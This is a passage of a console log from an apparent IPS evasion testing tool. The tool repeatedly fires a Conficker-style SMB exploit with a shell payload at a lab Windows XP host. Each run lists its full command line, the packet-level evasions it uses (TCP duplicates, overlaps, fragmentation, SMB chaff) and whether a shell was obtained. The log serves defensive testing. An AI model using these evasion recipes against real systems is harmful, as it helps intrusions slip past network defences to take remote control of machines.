- Info: Using random seed x4ty6ZS0nOj
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 245151688> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.111:51373 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......2015-06-08 00:20:20 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20184 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=/GWBnefJ0qc --evasion=[smb_opentree,end]smb_decoytrees,"7","1","7","random_msrpcreq" --evasion=[smb_opentree,msrpc_req]tcp_segvar,"6","23567" --verifydelay=1000 --payload=shell
- Info: Using random seed /GWBnefJ0qf
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - TCP packets are segmented to contain between 6 and 23567 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:20184 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 7013 runs averaging 1.92 runs / second ; progress: 3651/43200............2015-06-08 00:20:24 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50253 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=+EAg6yyT0Q8 --evasion=[netbios_connect,smb_openpipe]netbios_chaff,"3","empty_keepalive|small_unspec|broken_length" --evasion=[msrpc_bind,end]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"2","138129007","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed +EAg6yyT0Q/
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 138129007> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.111:50253 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 7029 runs averaging 1.92 runs / second ; progress: 3656/43200..........
- 7039 runs averaging 1.92 runs / second ; progress: 3661/43200
- 7039 runs averaging 1.92 runs / second ; progress: 3666/43200....
- 7043 runs averaging 1.92 runs / second ; progress: 3671/43200Pid 22703 timed out - killed
- 2015-06-08 00:20:41 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11635 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=zuKNA5Eh+dU --evasion=[msrpc_req,end]tcp_overlap,"148","new","random_alpha" --evasion=[start,msrpc_bind]tcp_paws,"3","259841060","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed zuKNA5Eh+dX
- The following evasions are applied from stage start to msrpc_bind:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 259841060> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP segments are set to overlap by 148 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.119:11635 -> 10.35.1.207:445
- Terminated
- ...2015-06-08 00:20:42 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34260 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=OThj9hiUOtM --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"3","6","9","zero" --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed OThj9hiUOtM
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
- Info: NetBIOS connection 10.62.90.119:34260 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 7062 runs averaging 1.92 runs / second ; progress: 3676/43200........................
- 7086 runs averaging 1.93 runs / second ; progress: 3681/43200....................
- 7106 runs averaging 1.93 runs / second ; progress: 3686/43200............
- 7118 runs averaging 1.93 runs / second ; progress: 3691/43200.........
- 7127 runs averaging 1.93 runs / second ; progress: 3696/43200............
- 7139 runs averaging 1.93 runs / second ; progress: 3701/43200......................
- 7161 runs averaging 1.93 runs / second ; progress: 3706/43200......2015-06-08 00:21:18 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55696 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wu99YAOc5D4 --evasion=[start,end]tcp_paws,"1","137960857","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_segvar,"7","9" --verifydelay=1000 --payload=shell
- Info: Using random seed wu99YAOc5D7
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137960857> and has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - TCP packets are segmented to contain between 7 and 9 bytes of payload.
- Info: NetBIOS connection 10.62.90.111:55696 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-06-08 00:21:20 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45781 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=ZZ+P5wIie94 --evasion=[smb_connect,msrpc_req]tcp_paws,"1","8","alphanumrandomized" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed ZZ+P5wIie95
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:45781 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 7175 runs averaging 1.93 runs / second ; progress: 3711/43200...
- 7178 runs averaging 1.93 runs / second ; progress: 3716/43200
- 7178 runs averaging 1.93 runs / second ; progress: 3721/43200.........
- 7187 runs averaging 1.93 runs / second ; progress: 3726/43200........
- 7195 runs averaging 1.93 runs / second ; progress: 3731/43200.....
- 7200 runs averaging 1.93 runs / second ; progress: 3736/43200......
- 7206 runs averaging 1.93 runs / second ; progress: 3741/43200...............
- 7221 runs averaging 1.93 runs / second ; progress: 3746/43200..............2015-06-08 00:22:00 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57074 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=5cqSwRZrPCA --evasion=[msrpc_req,end]netbios_chaff,"3","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","10","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5cqSwRZrPCD
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.111:57074 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 7244 runs averaging 1.93 runs / second ; progress: 3751/43200..............
- 7258 runs averaging 1.93 runs / second ; progress: 3756/43200..2015-06-08 00:22:08 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62429 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=0NColTrOQC8 --evasion=[netbios_connect,end]ipv4_opt,"8","inc","random_alpha" --evasion=[msrpc_req,end]smb_fnameobf,"change_case" --evasion=[smb_opentree,end]tcp_paws,"25%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 0NColTrOQC/
- The following evasions are applied from stage netbios_connect to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.111:62429 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 7263 runs averaging 1.93 runs / second ; progress: 3761/43200.......
- 7270 runs averaging 1.93 runs / second ; progress: 3766/43200...............
- 7285 runs averaging 1.93 runs / second ; progress: 3771/43200...2015-06-08 00:22:23 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17911 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=7pze8/Sv444 --evasion=[smb_opentree,msrpc_req]smb_chaff,"8","write_flag","zero" --evasion=[smb_openpipe,end]smb_writeandxpad,"1","random_alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","162615983","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed 7pze8/Sv447
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162615983> and has shuffled original payload
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_openpipe to end:
- - 1 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.119:17911 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 7296 runs averaging 1.93 runs / second ; progress: 3776/43200.....
- 7301 runs averaging 1.93 runs / second ; progress: 3781/43200Pid 24284 timed out - killed
- 2015-06-08 00:22:32 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23611 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5alRX97X2kI --evasion=[smb_openpipe,msrpc_bind]tcp_seg,"1" --evasion=[smb_connect,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5alRX97X2kL
- The following evasions are applied from stage smb_connect to end:
- - Add a random urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP packets are segmented to contain at most 1 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:23611 -> 10.35.1.207:445
- Terminated
- ......
- 7308 runs averaging 1.93 runs / second ; progress: 3786/43200.......Pid 24401 timed out - killed
- 2015-06-08 00:22:38 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15171 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=xVzzkXF3BXg --evasion=[start,end]tcp_chaff,"75%","outofwindow|longhdr","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed xVzzkXF3BXj
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.117:15171 -> 10.35.1.207:445
- Terminated
- ......2015-06-08 00:22:41 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28276 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=8Ve8ihD6S7w --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"427","new","random_alpha" --evasion=[smb_openpipe,end]tcp_paws,"75%","238041912","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 8Ve8ihD6S7z
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - TCP segments are set to overlap by 427 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238041912> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:28276 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7323 runs averaging 1.93 runs / second ; progress: 3791/43200.....................
- 7344 runs averaging 1.93 runs / second ; progress: 3796/43200.......2015-06-08 00:22:49 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13572 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=WCJX7PrlRFg --evasion=[netbios_connect,smb_openpipe]ipv4_opt,"21","inc","random_alphanum" --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"13","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","4","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed WCJX7PrlRFh
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.119:13572 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 7359 runs averaging 1.94 runs / second ; progress: 3802/43200.Pid 24561 timed out - killed
- 2015-06-08 00:22:53 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47020 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4AYntnpSJsY --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"80" --evasion=[smb_openpipe,end]smb_decoytrees,"3","5","2047","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 4AYntnpSJsb
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 80 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.114:47020 -> 10.35.1.207:445
- Terminated
- ...2015-06-08 00:22:55 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62759 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=RvuqRNAqohM --evasion=[msrpc_bind,end]tcp_chaff,"75%","nullchksum|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_req,end]tcp_paws,"75%","268435455","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed RvuqRNAqohN
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:62759 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 7370 runs averaging 1.94 runs / second ; progress: 3807/43200......
- 7376 runs averaging 1.94 runs / second ; progress: 3812/43200...........
- 7387 runs averaging 1.94 runs / second ; progress: 3817/43200..................
- 7405 runs averaging 1.94 runs / second ; progress: 3822/43200..............
- 7419 runs averaging 1.94 runs / second ; progress: 3827/43200................
- 7435 runs averaging 1.94 runs / second ; progress: 3832/43200......2015-06-08 00:23:25 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13041 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oSdy0TUrlxM --evasion=[smb_connect,smb_opentree]ipv4_frag,"480" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","6","719","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed oSdy0TUrlxO
- The following evasions are applied from stage smb_connect to smb_opentree:
- - IPv4 fragments with at most 480 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 719 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:13041 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 7449 runs averaging 1.94 runs / second ; progress: 3837/43200............
- 7461 runs averaging 1.94 runs / second ; progress: 3842/43200.
- 7462 runs averaging 1.94 runs / second ; progress: 3847/43200.2015-06-08 00:23:37 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25609 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jDaePIJ6iso --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"50%","inc","random_alphanum" --evasion=[smb_opentree,end]smb_chaff,"8","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed jDaePIJ6isq
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.113:25609 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 7469 runs averaging 1.94 runs / second ; progress: 3852/43200....
- 7473 runs averaging 1.94 runs / second ; progress: 3857/43200......
- 7479 runs averaging 1.94 runs / second ; progress: 3862/43200.................
- 7496 runs averaging 1.94 runs / second ; progress: 3867/43200...................
- 7515 runs averaging 1.94 runs / second ; progress: 3872/43200...........
- 7526 runs averaging 1.94 runs / second ; progress: 3877/43200....
- 7530 runs averaging 1.94 runs / second ; progress: 3882/43200..2015-06-08 00:24:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20015 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=dQUimTokmKg --evasion=[netbios_connect,smb_opentree]tcp_paws,"75%","7","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","10","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed dQUimTokmKh
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.113:20015 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7533 runs averaging 1.94 runs / second ; progress: 3887/43200..2015-06-08 00:24:19 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24870 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=LEWXIa/Bd2k --evasion=[start,msrpc_bind]ipv4_frag,"56" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed LEWXIa/Bd2k
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.113:24870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 7540 runs averaging 1.94 runs / second ; progress: 3892/43200.........
- 7549 runs averaging 1.94 runs / second ; progress: 3897/43200..........
- 7559 runs averaging 1.94 runs / second ; progress: 3902/43200..Pid 25915 timed out - killed
- 2015-06-08 00:24:34 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31672 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=R7NIX+Io+yg --evasion=[start,smb_openpipe]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed R7NIX+Io+yh
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.115:31672 -> 10.35.1.207:445
- Terminated
- .........
- 7571 runs averaging 1.94 runs / second ; progress: 3907/43200........Pid 26040 timed out - killed
- 2015-06-08 00:24:39 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42437 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5+99742Gcsk --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --evasion=[netbios_connect,smb_connect]tcp_seg,"10" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 5+99742Gcsn
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP packets are segmented to contain at most 10 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:42437 -> 10.35.1.207:445
- Terminated
- ............
- 7592 runs averaging 1.94 runs / second ; progress: 3912/43200......2015-06-08 00:24:45 INFO
- Success. (10.62.90.117):
